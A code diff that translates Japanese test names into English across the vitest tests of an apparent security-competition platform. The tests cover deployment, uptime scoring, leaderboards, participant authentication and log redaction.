@@ -133,7 +133,7 @@ describe("uptime-flat kind (ADR-012 Phase 3.B、 legacy uptime probe 動作不�
     expect(calledUrl).toBe("https://frontend.example.com/");
   });
 
-  it("override がある slot は override URL を probe すべき", async () => {
+  it("should probe the override URL for slots with an override", async () => {
     fetchMock.mockResolvedValue({ status: 200, text: async () => "" });
     const input = buildInput({
       scoring: {
@@ -154,7 +154,7 @@ describe("uptime-flat kind (ADR-012 Phase 3.B、 legacy uptime probe 動作不�
     expect(fetchMock.mock.calls[0]?.[0]).toBe("https://my-override.example.com/");
   });
 
-  it("stackOutputs が無いと noop になるべき (= deploy 未完了で probe しない)", async () => {
+  it("should noop when stackOutputs is missing (don't probe pre-deploy)", async () => {
     const input = buildInput({
       deployment: { ...buildInput().deployment, stackOutputs: undefined },
     });
@@ -164,7 +164,7 @@ describe("uptime-flat kind (ADR-012 Phase 3.B、 legacy uptime probe 動作不�
     expect(fetchMock).not.toHaveBeenCalled();
   });
 
-  it('legacy `kind: "uptime"` 入力でも flat probe として動くべき (= alias 互換)', async () => {
+  it('should run as a flat probe for legacy `kind: "uptime"` input (alias compat)', async () => {
     fetchMock.mockResolvedValue({ status: 200, text: async () => "" });
     const input = buildInput({
       scoring: {

--- a/infrastructure/test/problem-deploy/generic-scoring-uptime-multi.test.ts
+++ b/infrastructure/test/problem-deploy/generic-scoring-uptime-multi.test.ts
@@ -63,7 +63,7 @@ describe("uptime-multi kind", () => {
     vi.unstubAllGlobals();
   });
 
-  it("全 slot 200 なら pointsAllOk を加点すべき", async () => {
+  it("should award pointsAllOk when all slots return 200", async () => {
     fetchMock.mockResolvedValue({ status: 200, text: async () => "" });
     const result = await runUptimeMultiKind(buildInput());
     expect(result.scoreDelta).toBe(100);
@@ -71,7 +71,7 @@ describe("uptime-multi kind", () => {
     expect(result.lastResult).toBe("ok");
   });
 
-  it("1 slot fail なら failurePenalty を加点すべき (負値 = 減点)", async () => {
+  it("should add failurePenalty when 1 slot fails (negative value = deduction)", async () => {
     fetchMock
       .mockResolvedValueOnce({ status: 200, text: async () => "" })
       .mockResolvedValueOnce({ status: 500, text: async () => "" });
@@ -80,7 +80,7 @@ describe("uptime-multi kind", () => {
     expect(result.lastResult).toBe("fail");
   });
 
-  it("failurePenalty 省略時は default 0 で加点しないべき", async () => {
+  it("should default failurePenalty to 0 and not award anything when omitted", async () => {
     fetchMock.mockResolvedValue({ status: 500, text: async () => "" });
     const input = buildInput({
       scoring: {
@@ -97,7 +97,7 @@ describe("uptime-multi kind", () => {
     expect(result.lastResult).toBe("fail");
   });
 
-  it("全 slot が解決不可なら noop になるべき (= deploy 未完了 / stack output 不在)", async () => {
+  it("should noop when no slot can be resolved (deploy not yet complete / stack output absent)", async () => {
     const input = buildInput({
       deployment: { ...buildInput().deployment, stackOutputs: JSON.stringify({}) },
     });
@@ -106,7 +106,7 @@ describe("uptime-multi kind", () => {
     expect(result.scoreEvents).toEqual([]);
   });
 
-  it("override がある slot は override URL を probe すべき", async () => {
+  it("should probe the override URL for slots with an override", async () => {
     fetchMock.mockResolvedValue({ status: 200, text: async () => "" });
     const input = buildInput({
       overrides: [{ slot: "frontend", overrideUrl: "https://override.example.com/" }],
@@ -115,7 +115,7 @@ describe("uptime-multi kind", () => {
     expect(fetchMock.mock.calls[0]?.[0]).toBe("https://override.example.com/");
   });
 
-  it("ok→fail 遷移時に attack-detected を emit すべき (= ADR-005 D2-A 互換)", async () => {
+  it("should emit attack-detected on ok→fail transition (ADR-005 D2-A compat)", async () => {
     fetchMock.mockResolvedValue({ status: 500, text: async () => "" });
     const input = buildInput({
       scoring: {
@@ -134,7 +134,7 @@ describe("uptime-multi kind", () => {
     });
   });
 
-  it("appendPath を含む slot default URL を組み立てて probe すべき", async () => {
+  it("should build the slot default URL including appendPath and probe it", async () => {
     fetchMock.mockResolvedValue({ status: 200, text: async () => "" });
     const input = buildInput({
       scoring: {

--- a/infrastructure/test/problem-deploy/handler-error-cors.test.ts
+++ b/infrastructure/test/problem-deploy/handler-error-cors.test.ts
@@ -81,7 +81,7 @@ eventApp.get(TEST_THROW_PATH, () => {
 });
 
 describe("Hono handler onError (#559 defensive layer)", () => {
-  it("deploy-handler: 未捕捉 throw でも 500 + CORS headers + JSON `error` を返すべき", async () => {
+  it("deploy-handler: should return 500 + CORS headers + JSON `error` even on uncaught throws", async () => {
     const res = await deployApp.request(TEST_THROW_PATH);
     expect(res.status).toBe(500);
     // CORS middleware が onError 経路でも適用される (#559 防御の本旨)
@@ -92,7 +92,7 @@ describe("Hono handler onError (#559 defensive layer)", () => {
     expect(body.message).toBeUndefined();
   });
 
-  it("event-handler: 未捕捉 throw でも 500 + CORS headers + JSON `error` を返すべき", async () => {
+  it("event-handler: should return 500 + CORS headers + JSON `error` even on uncaught throws", async () => {
     const res = await eventApp.request(TEST_THROW_PATH);
     expect(res.status).toBe(500);
     expect(res.headers.get("access-control-allow-origin")).toBe("*");
@@ -101,7 +101,7 @@ describe("Hono handler onError (#559 defensive layer)", () => {
     expect(body.message).toBeUndefined();
   });
 
-  it("既存 handler の内部 catch 経路も 500 + CORS で返るべき (= 既存挙動の regression 防止)", async () => {
+  it("existing handler internal catch paths should also return 500 + CORS (regression guard)", async () => {
     // 既存 handler は throw を内部 catch → `c.json({ error: "internal_error" }, 500)` する。
     // onError ではなく通常の return path だが、CORS middleware が等しく適用されることを pin。
     deployMocks.listDeployments.mockRejectedValueOnce(new Error("inner catch path"));

--- a/infrastructure/test/problem-deploy/hint-reveal.test.ts
+++ b/infrastructure/test/problem-deploy/hint-reveal.test.ts
@@ -66,7 +66,7 @@ describe("isHintRevealed (#742 Phase 2)", () => {
 });
 
 describe("findHintReveal (#742 Phase 2)", () => {
-  it("該当 record を返すべき", () => {
+  it("should return the matching record", () => {
     const records = [{ hintId: "h1", revealedAt: "t1", penaltyApplied: 5 }];
     expect(findHintReveal(records, "h1")).toEqual({
       hintId: "h1",
@@ -75,7 +75,7 @@ describe("findHintReveal (#742 Phase 2)", () => {
     });
   });
 
-  it("undefined records / 不在 hintId は undefined を返すべき", () => {
+  it("should return undefined for undefined records / missing hintId", () => {
     expect(findHintReveal(undefined, "h1")).toBeUndefined();
     expect(findHintReveal([], "h1")).toBeUndefined();
   });

--- a/infrastructure/test/problem-deploy/leaderboard-score-events.test.ts
+++ b/infrastructure/test/problem-deploy/leaderboard-score-events.test.ts
@@ -61,7 +61,7 @@ const event = (over: Record<string, unknown> = {}) => ({
 describe("getLeaderboardScoreEvents", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("自チーム + ライバルチームの events を team 単位で group + occurredAt 昇順で返すべき", async () => {
+  it("should return own-team + rival-team events grouped by team and sorted by occurredAt ascending", async () => {
     const { shared, ddbSend } = buildShared();
     // 1st: GSI2 (my team) — 1 deployment
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
@@ -138,7 +138,7 @@ describe("getLeaderboardScoreEvents", () => {
     expect(out.response.eventId).toBe("EV1");
   });
 
-  it("teamLoginKey 不正 (= GSI2 が空) は unauthorized を返すべき", async () => {
+  it("should return unauthorized on invalid teamLoginKey (empty GSI2)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [] });
     const out = await getLeaderboardScoreEvents(shared, "BAD");
@@ -146,7 +146,7 @@ describe("getLeaderboardScoreEvents", () => {
     expect(ddbSend).toHaveBeenCalledTimes(1);
   });
 
-  it("自チームに eventId / teamId が無い (= Phase 1 以前の旧 deployment) なら no_event を返すべき", async () => {
+  it("should return no_event when own team has no eventId / teamId (pre-Phase 1 legacy deployment)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [meta({ eventId: undefined, teamId: undefined })],
@@ -155,7 +155,7 @@ describe("getLeaderboardScoreEvents", () => {
     expect(out).toEqual({ kind: "no_event" });
   });
 
-  it("自チームの deployment が全て DELETING / DELETED なら unauthorized を返すべき", async () => {
+  it("should return unauthorized when all own-team deployments are DELETING / DELETED", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [meta({ status: "DELETING" }), meta({ status: "DELETED" })],
@@ -164,7 +164,7 @@ describe("getLeaderboardScoreEvents", () => {
     expect(out).toEqual({ kind: "unauthorized" });
   });
 
-  it("hint / flag-wrong / uptime / flag を chart 用 view に含めるべき (= 累計が leaderboard と一致)", async () => {
+  it("should include hint / flag-wrong / uptime / flag in the chart view (cumulative matches the leaderboard)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
@@ -208,7 +208,7 @@ describe("getLeaderboardScoreEvents", () => {
     expect(total).toBe(65); // 5 + 100 - 30 - 10
   });
 
-  it("DELETING / DELETED の deployment は group から除外するべき (= 自チームの archived 行を集計しない)", async () => {
+  it("should exclude DELETING / DELETED deployments from groups (don't aggregate own team's archived rows)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
     ddbSend.mockResolvedValueOnce({
@@ -230,7 +230,7 @@ describe("getLeaderboardScoreEvents", () => {
     expect(teamIds).not.toContain("TEAM_DEAD");
   });
 
-  it("operator 内部情報 (teamLoginKey / tenantId / awsAccountId / expiresAt) を出力に含めないべき", async () => {
+  it("should not include operator-internal info (teamLoginKey / tenantId / awsAccountId / expiresAt) in output", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
@@ -259,7 +259,7 @@ describe("getLeaderboardScoreEvents", () => {
     expect(json).toContain("TEAM_ME");
   });
 
-  it("EVENT# query は ScanIndexForward=false (= 新しい順) + Limit + PK で発火すべき", async () => {
+  it("EVENT# query should fire with ScanIndexForward=false (newest-first) + Limit + PK", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
@@ -272,7 +272,7 @@ describe("getLeaderboardScoreEvents", () => {
     expect(evQuery.input.ExpressionAttributeValues?.[":evpfx"]).toBe("EVENT#");
   });
 
-  it("複数 deployment / page も読み切って 1 team に集約すべき", async () => {
+  it("should read across multiple deployments / pages and aggregate into 1 team", async () => {
     const { shared, ddbSend } = buildShared();
     // 自チームに 2 deployment、 events を 2 page にわたって返す
     ddbSend.mockResolvedValueOnce({ Items: [meta(), meta({ PK: "DEPLOYMENT#J2", jobId: "J2" })] });

--- a/infrastructure/test/problem-deploy/naming.test.ts
+++ b/infrastructure/test/problem-deploy/naming.test.ts
@@ -2,25 +2,25 @@ import { describe, expect, it } from "vitest";
 import { buildStackPrefix, slugify } from "../../lib/problem-deploy/handlers/deploy-handler/naming";
 
 describe("backend naming (frontend と同じ規約)", () => {
-  it("buildStackPrefix は `tc-{problemSlug}-{teamSlug}` を返すべき", () => {
+  it("buildStackPrefix should return `tc-{problemSlug}-{teamSlug}`", () => {
     expect(buildStackPrefix("security-battle-royale", "Alpha Team")).toBe(
       "tc-security-battle-royale-alpha-team",
     );
   });
 
-  it("slugify は英数字以外をハイフンに変換するべき", () => {
+  it("slugify should convert non-alphanumerics to hyphens", () => {
     expect(slugify("Alpha Team!")).toBe("alpha-team");
   });
 
-  it("先頭末尾の連続ハイフンを刈るべき", () => {
+  it("should trim leading/trailing consecutive hyphens", () => {
     expect(slugify("---hello---")).toBe("hello");
   });
 
-  it("40 文字を超えたら truncate するべき", () => {
+  it("should truncate when exceeding 40 characters", () => {
     expect(slugify("a".repeat(60))).toHaveLength(40);
   });
 
-  it("空文字なら空文字を返すべき (validation は呼び出し側責務)", () => {
+  it("should return empty for empty input (validation is the caller's responsibility)", () => {
     expect(slugify("")).toBe("");
   });
 });

--- a/infrastructure/test/problem-deploy/participant-auth.test.ts
+++ b/infrastructure/test/problem-deploy/participant-auth.test.ts
@@ -5,12 +5,12 @@ import { extractBearerToken } from "../../lib/problem-deploy/handlers/participan
 const VALID = "AbCdEfGhIjKlMnOpQrStUvWxYzAbCdEfGhIjKlMnOpQ"; // 43 文字 base64url
 
 describe("extractBearerToken", () => {
-  it("Bearer プレフィックスから 43 文字 base64url を抜くべき", () => {
+  it("should extract a 43-char base64url token from the Bearer prefix", () => {
     expect(VALID).toHaveLength(43);
     expect(extractBearerToken(`Bearer ${VALID}`)).toBe(VALID);
   });
 
-  it("プレフィックス大文字小文字に寛容であるべき", () => {
+  it("should be tolerant of prefix case", () => {
     expect(extractBearerToken(`bearer ${VALID}`)).toBe(VALID);
     expect(extractBearerToken(`BEARER ${VALID}`)).toBe(VALID);
   });

--- a/infrastructure/test/problem-deploy/participant-battle-attacks.test.ts
+++ b/infrastructure/test/problem-deploy/participant-battle-attacks.test.ts
@@ -34,7 +34,7 @@ const teamRow = (over: Record<string, unknown> = {}) => ({
 describe("listBattleAttacks", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("不正な jobId (ULID 形式でない) は invalid_jobid を返すべき", async () => {
+  it("should return invalid_jobid for invalid jobId (not ULID form)", async () => {
     const { shared } = buildShared();
     const out = await listBattleAttacks(shared, TEAM_KEY, "not-ulid", 30, NOW_MS);
     expect(out).toEqual({ kind: "invalid_jobid" });

--- a/infrastructure/test/problem-deploy/participant-deploy-logs.test.ts
+++ b/infrastructure/test/problem-deploy/participant-deploy-logs.test.ts
@@ -31,11 +31,11 @@ const shared = {
 } as unknown as ParticipantSharedResources;
 
 describe("parseDeployLogLimit", () => {
-  it("未指定なら default limit を返すべき", () => {
+  it("should return the default limit when unspecified", () => {
     expect(parseDeployLogLimit(undefined)).toBe(50);
   });
 
-  it("1-100 の整数だけを許可すべき", () => {
+  it("should accept only integers from 1 to 100", () => {
     expect(parseDeployLogLimit("1")).toBe(1);
     expect(parseDeployLogLimit("100")).toBe(100);
     expect(parseDeployLogLimit("0")).toBeNull();
@@ -46,7 +46,7 @@ describe("parseDeployLogLimit", () => {
 });
 
 describe("getParticipantDeployLogs", () => {
-  it("teamLoginKey に紐づく deployment が無ければ unauthorized を返すべき", async () => {
+  it("should return unauthorized when there are no deployments linked to teamLoginKey", async () => {
     vi.mocked(queryTeamItems).mockResolvedValueOnce([]);
     const deps = buildDeps();
 
@@ -57,7 +57,7 @@ describe("getParticipantDeployLogs", () => {
     expect(deps.logs.send).not.toHaveBeenCalled();
   });
 
-  it("別 jobId は not_found を返し CodeBuild を呼ばないべき", async () => {
+  it("should return not_found without calling CodeBuild for a different jobId", async () => {
     vi.mocked(queryTeamItems).mockResolvedValueOnce([{ jobId: "01HOTHERJOBID012345678901" }]);
     const deps = buildDeps();
 
@@ -67,7 +67,7 @@ describe("getParticipantDeployLogs", () => {
     expect(deps.codebuild.send).not.toHaveBeenCalled();
   });
 
-  it("buildId 未採番なら空ログを 200 用 response として返すべき", async () => {
+  it("should return an empty log as a 200 response when buildId has not been assigned", async () => {
     vi.mocked(queryTeamItems).mockResolvedValueOnce([
       { jobId: JOB_ID, status: "PENDING", updatedAt: "2026-05-20T10:00:00.000Z" },
     ]);
@@ -87,7 +87,7 @@ describe("getParticipantDeployLogs", () => {
     expect(deps.codebuild.send).not.toHaveBeenCalled();
   });
 
-  it("CodeBuild の log group/stream から増分 log events を返すべき", async () => {
+  it("should return incremental log events from the CodeBuild log group/stream", async () => {
     vi.mocked(queryTeamItems).mockResolvedValueOnce([
       { jobId: JOB_ID, status: "IN_PROGRESS", buildId: "project:build-1" },
     ]);
@@ -146,7 +146,7 @@ describe("getParticipantDeployLogs", () => {
     });
   });
 
-  it("CodeBuild が terminal status なら complete=true を返すべき", async () => {
+  it("should return complete=true when CodeBuild is in a terminal status", async () => {
     vi.mocked(queryTeamItems).mockResolvedValueOnce([
       { jobId: JOB_ID, status: "IN_PROGRESS", buildId: "project:build-1" },
     ]);
@@ -170,7 +170,7 @@ describe("getParticipantDeployLogs", () => {
     expect(out.response.buildStatus).toBe("FAILED");
   });
 
-  it("flagOutputKey を含む CodeBuild log は redaction して返すべき", async () => {
+  it("should redact CodeBuild logs containing flagOutputKey before returning", async () => {
     const flagShared = {
       ...shared,
       problemsScoring: {

--- a/infrastructure/test/problem-deploy/participant-leaderboard.test.ts
+++ b/infrastructure/test/problem-deploy/participant-leaderboard.test.ts
@@ -41,7 +41,7 @@ describe("buildLeaderboardEntries (pure)", () => {
     expect(buildLeaderboardEntries([], "T1")).toEqual([]);
   });
 
-  it("複数 team / 複数 problem を team で集計しスコア降順 + rank 付与するべき", () => {
+  it("should aggregate multiple teams / multiple problems per team, sort by score desc, and assign rank", () => {
     const items = [
       sampleRow({ teamId: "T1", problemId: "p1", score: 100, status: "COMPLETE" }),
       sampleRow({ teamId: "T1", problemId: "p2", score: 50, status: "COMPLETE" }),
@@ -57,7 +57,7 @@ describe("buildLeaderboardEntries (pure)", () => {
     expect(out[2]).toMatchObject({ rank: 3, teamId: "T3", score: 150 });
   });
 
-  it("isMyTeam=true で自分の team をマークするべき (UI ハイライト用)", () => {
+  it("should mark own team with isMyTeam=true (for UI highlighting)", () => {
     const items = [
       sampleRow({ teamId: "T1", problemId: "p1", score: 100 }),
       sampleRow({ teamId: "T2", problemId: "p1", score: 200 }),
@@ -77,7 +77,7 @@ describe("buildLeaderboardEntries (pure)", () => {
     expect(out.find((e) => e.teamId === "T2")?.teamName).toBe("team-2");
   });
 
-  it("DELETING / DELETED 行は集計から除外するべき", () => {
+  it("should exclude DELETING / DELETED rows from aggregation", () => {
     const items = [
       sampleRow({ teamId: "T1", score: 100, status: "COMPLETE" }),
       sampleRow({ teamId: "T1", score: 999, status: "DELETING" }),
@@ -98,7 +98,7 @@ describe("buildLeaderboardEntries (pure)", () => {
     expect(out[0]?.score).toBe(100);
   });
 
-  it("score / completedProblems の集計が正しいべき", () => {
+  it("score / completedProblems aggregation should be correct", () => {
     const items = [
       sampleRow({ teamId: "T1", problemId: "p1", score: 100, status: "COMPLETE" }),
       sampleRow({ teamId: "T1", problemId: "p2", score: 50, status: "COMPLETE" }),
@@ -113,7 +113,7 @@ describe("buildLeaderboardEntries (pure)", () => {
     });
   });
 
-  it("teamLoginKey / tenantId / awsAccountId 等 operator 内部情報を出力に含めないべき", () => {
+  it("should not include operator-internal info (teamLoginKey / tenantId / awsAccountId) in output", () => {
     const items = [
       sampleRow({
         teamId: "T1",
@@ -133,7 +133,7 @@ describe("buildLeaderboardEntries (pure)", () => {
 describe("getLeaderboard (integration)", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: team scope query → event scope query → 集計 view を返すべき", async () => {
+  it("normal case: should return aggregated view via team scope query → event scope query", async () => {
     const { shared, ddbSend } = buildShared();
     // 1st: GSI2 query (自 team の deployment)
     ddbSend.mockResolvedValueOnce({

--- a/infrastructure/test/problem-deploy/participant-lookup.test.ts
+++ b/infrastructure/test/problem-deploy/participant-lookup.test.ts
@@ -41,7 +41,7 @@ const sampleRow = (over: Record<string, unknown> = {}) => ({
 describe("lookupTeamByLoginKey (Phase 2c team scope)", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("GSI2 を TEAMKEY#<key> で Query するべき (Limit なし、team scope の全行を取る)", async () => {
+  it("should Query GSI2 with TEAMKEY#<key> (no Limit; fetch all rows in team scope)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
 
@@ -92,14 +92,14 @@ describe("lookupTeamByLoginKey (Phase 2c team scope)", () => {
   });
 
   // Issue #607: createdAt を portal API に露出 (= phase countdown timeline で使う)。
-  it("Issue #607: problem.createdAt を ParticipantProblemView に echo するべき", async () => {
+  it("Issue #607: should echo problem.createdAt into ParticipantProblemView", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
     const view = await lookupTeamByLoginKey(shared, "KEY1");
     expect(view?.problems[0]?.createdAt).toBe("2026-05-04T15:00:00.000Z");
   });
 
-  it("deployLog は DDB の進捗から競技者向け terminal 行を返すべき", async () => {
+  it("deployLog should return participant-facing terminal lines from DDB progress", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [
@@ -126,7 +126,7 @@ describe("lookupTeamByLoginKey (Phase 2c team scope)", () => {
     expect(JSON.stringify(log)).not.toContain("tc-secret-team");
   });
 
-  it("deployLog は失敗理由を terminal 行に含めるべき", async () => {
+  it("deployLog should include the failure reason in the terminal lines", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [
@@ -146,7 +146,7 @@ describe("lookupTeamByLoginKey (Phase 2c team scope)", () => {
     });
   });
 
-  it("Phase 2a 経由の eventId / teamId 列が team に伝播するべき", async () => {
+  it("should propagate eventId / teamId columns from the Phase 2a path into team", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [sampleRow({ eventId: "EV1", teamId: "T1" })],
@@ -184,7 +184,7 @@ describe("lookupTeamByLoginKey (Phase 2c team scope)", () => {
     expect(view).toBeUndefined();
   });
 
-  it("一部だけ DELETED な team は live な行のみで problems[] を構築するべき", async () => {
+  it("should build problems[] from live rows only for teams partially DELETED", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({
       Items: [
@@ -229,7 +229,7 @@ describe("lookupTeamByLoginKey (Phase 2c team scope)", () => {
     expect(view?.problems[0]?.stackOutputs).toEqual({});
   });
 
-  it("flag 形式 problem では flagOutputKey の値を stackOutputs から strip するべき (= 答え露出防止)", async () => {
+  it("should strip the flagOutputKey value from stackOutputs for flag-form problems (prevent answer leak)", async () => {
     const scoring = {
       "security-battle-royale": {
         kind: "flag" as const,
@@ -255,7 +255,7 @@ describe("lookupTeamByLoginKey (Phase 2c team scope)", () => {
     expect(view?.problems[0]?.scoring?.points).toBe(100);
   });
 
-  it("score / lastScoredAt / lastResult / scoring を problem view に含めるべき", async () => {
+  it("should include score / lastScoredAt / lastResult / scoring in the problem view", async () => {
     const scoring = {
       "security-battle-royale": { kind: "uptime" as const, pointsPerSuccess: 50 },
     };
@@ -279,7 +279,7 @@ describe("lookupTeamByLoginKey (Phase 2c team scope)", () => {
     expect(p?.scoring?.pointsPerSuccess).toBe(50);
   });
 
-  it("score 未設定の row は 0 を返すべき (default)", async () => {
+  it("should return 0 for rows without score (default)", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow()] });
 
@@ -289,7 +289,7 @@ describe("lookupTeamByLoginKey (Phase 2c team scope)", () => {
 
   /* ADR-005 Phase 3.1: applicationStatus aggregate ----------------------- */
 
-  it("uptime kind problem の applicationStatus を aggregate (healthy) で返すべき", async () => {
+  it("should return uptime-kind problem applicationStatus as aggregate (healthy)", async () => {
     const scoring = {
       "security-battle-royale": {
         kind: "uptime" as const,
@@ -361,7 +361,7 @@ describe("lookupTeamByLoginKey (Phase 2c team scope)", () => {
     expect(view?.problems[0]?.applicationStatus?.totalCount).toBe(0);
   });
 
-  it("flag kind problem は applicationStatus を露出しないべき (= Challenge は対象外)", async () => {
+  it("flag kind problem should not expose applicationStatus (Challenges are out of scope)", async () => {
     const scoring = {
       "hello-world": { kind: "flag" as const, flagOutputKey: "F", points: 100 },
     };
@@ -379,7 +379,7 @@ describe("lookupTeamByLoginKey (Phase 2c team scope)", () => {
     expect(view?.problems[0]?.applicationStatus).toBeUndefined();
   });
 
-  it("applicationStatus に endpoint 名 / URL を絶対に含めないべき (snapshot guard)", async () => {
+  it("should never include endpoint names / URLs in applicationStatus (snapshot guard)", async () => {
     const scoring = { p: { kind: "uptime" as const, pointsPerSuccess: 5, endpoints: [] } };
     const { shared, ddbSend } = buildShared(scoring);
     ddbSend.mockResolvedValueOnce({

--- a/infrastructure/test/problem-deploy/participant-routes.test.ts
+++ b/infrastructure/test/problem-deploy/participant-routes.test.ts
@@ -32,7 +32,7 @@ const { app } = await import("../../lib/problem-deploy/handlers/participant-hand
 const VALID_KEY = "AbCdEfGhIjKlMnOpQrStUvWxYzAbCdEfGhIjKlMnOpQ"; // 43 文字 base64url
 
 describe("GET /portal/healthz", () => {
-  it("ok: true を返すべき (auth 不要)", async () => {
+  it("should return ok: true (no auth required)", async () => {
     const res = await app.request("/portal/healthz");
     expect(res.status).toBe(200);
     const body = await res.json();
@@ -43,7 +43,7 @@ describe("GET /portal/healthz", () => {
 describe("GET /portal/me", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("正常系: lookup ヒットで 200 と team scope view を返すべき", async () => {
+  it("normal case: should return 200 with team-scope view on lookup hit", async () => {
     mocks.lookupTeamByLoginKey.mockResolvedValueOnce({
       team: { teamName: "Alpha", teamNameSetByCompetitor: false },
       problems: [
@@ -112,7 +112,7 @@ describe("GET /portal/me", () => {
 describe("GET /portal/me/deploy-logs", () => {
   beforeEach(() => vi.clearAllMocks());
 
-  it("jobId が無い場合は 400 を返すべき", async () => {
+  it("should return 400 when jobId is missing", async () => {
     const res = await app.request("/portal/me/deploy-logs", {
       headers: { authorization: `Bearer ${VALID_KEY}` },
     });
@@ -121,7 +121,7 @@ describe("GET /portal/me/deploy-logs", () => {
     expect(mocks.getParticipantDeployLogs).not.toHaveBeenCalled();
   });
 
-  it("limit が不正なら 400 を返すべき", async () => {
+  it("should return 400 when limit is invalid", async () => {
     const res = await app.request(
       "/portal/me/deploy-logs?jobId=01H8XGJWBWBAQ4N6RZHM4S2KMV&limit=101",
       { headers: { authorization: `Bearer ${VALID_KEY}` } },
@@ -131,7 +131,7 @@ describe("GET /portal/me/deploy-logs", () => {
     expect(mocks.getParticipantDeployLogs).not.toHaveBeenCalled();
   });
 
-  it("正常系: deploy log response を返すべき", async () => {
+  it("normal case: should return deploy log response", async () => {
     mocks.getParticipantDeployLogs.mockResolvedValueOnce({
       kind: "ok",
       response: {
@@ -160,7 +160,7 @@ describe("GET /portal/me/deploy-logs", () => {
     });
   });
 
-  it("not_found outcome は 404 を返すべき", async () => {
+  it("not_found outcome should return 404", async () => {
     mocks.getParticipantDeployLogs.mockResolvedValueOnce({ kind: "not_found" });
 
     const res = await app.request("/portal/me/deploy-logs?jobId=01H8XGJWBWBAQ4N6RZHM4S2KMV", {

--- a/infrastructure/test/problem-deploy/participant-score-events.test.ts
+++ b/infrastructure/test/problem-deploy/participant-score-events.test.ts
@@ -143,7 +143,7 @@ describe("listScoreEvents", () => {
   // Issue #1038 P1 #8 follow-up: 旧 toView は uptime/flag のみ通したため、 PR-1043 で書き
   // 込まれる hint 行と Issue #817 で書き込まれる flag-wrong 行が participant の Score events
   // 履歴に表示されなかった。 4 source 全て (= uptime / flag / flag-wrong / hint) を含める。
-  it("hint reveal の減点行 (source=hint, result=ok, points=-30) を履歴に含めるべき", async () => {
+  it("should include hint-reveal deduction rows (source=hint, result=ok, points=-30) in history", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
     ddbSend.mockResolvedValueOnce({
@@ -168,7 +168,7 @@ describe("listScoreEvents", () => {
     }
   });
 
-  it("不正解 flag の減点行 (source=flag-wrong, result=wrong, points=-10) を履歴に含めるべき", async () => {
+  it("should include wrong-flag deduction rows (source=flag-wrong, result=wrong, points=-10) in history", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
     ddbSend.mockResolvedValueOnce({
@@ -193,7 +193,7 @@ describe("listScoreEvents", () => {
     }
   });
 
-  it("attack-detected (marker 用、 result=down) は participant 履歴に出さないべき", async () => {
+  it("should not surface attack-detected markers (result=down) in participant history", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
     ddbSend.mockResolvedValueOnce({
@@ -240,7 +240,7 @@ describe("listScoreEvents", () => {
     expect(secondPage.input.ExclusiveStartKey).toEqual({ PK: "DEPLOYMENT#J1", SK: "EVENT#x" });
   });
 
-  it("teamId / eventId / tenantId 等 operator 内部情報を出力に含めないべき", async () => {
+  it("should not include operator-internal info (teamId / eventId / tenantId) in output", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [meta()] });
     ddbSend.mockResolvedValueOnce({

--- a/infrastructure/test/problem-deploy/participant-sso.test.ts
+++ b/infrastructure/test/problem-deploy/participant-sso.test.ts
@@ -71,20 +71,20 @@ describe("getConsoleSigninUrl", () => {
 
   afterEach(() => fetchSpy.mockReset());
 
-  it("不正な jobId (ULID 形式でない) は invalid_jobid を返すべき", async () => {
+  it("should return invalid_jobid for invalid jobId (not ULID form)", async () => {
     const { shared } = buildShared();
     const result = await getConsoleSigninUrl(shared, TEAM_KEY, "not-ulid");
     expect(result).toEqual({ kind: "invalid_jobid" });
   });
 
-  it("teamLoginKey に該当 deployment が無ければ unauthorized を返すべき", async () => {
+  it("should return unauthorized when teamLoginKey has no matching deployments", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [] });
     const result = await getConsoleSigninUrl(shared, TEAM_KEY, VALID_JOB_ID);
     expect(result).toEqual({ kind: "unauthorized" });
   });
 
-  it("jobId が team の deployment 一覧に無ければ unauthorized を返すべき", async () => {
+  it("should return unauthorized when jobId is not in the team's deployment list", async () => {
     const { shared, ddbSend } = buildShared();
     ddbSend.mockResolvedValueOnce({ Items: [sampleRow({ jobId: "01HZX0K3M3K9ZQHB3MRQHBA1B3" })] });
     const result = await getConsoleSigninUrl(shared, TEAM_KEY, VALID_JOB_ID);
@@ -98,7 +98,7 @@ describe("getConsoleSigninUrl", () => {
     expect(result).toEqual({ kind: "unauthorized" });
   });
 
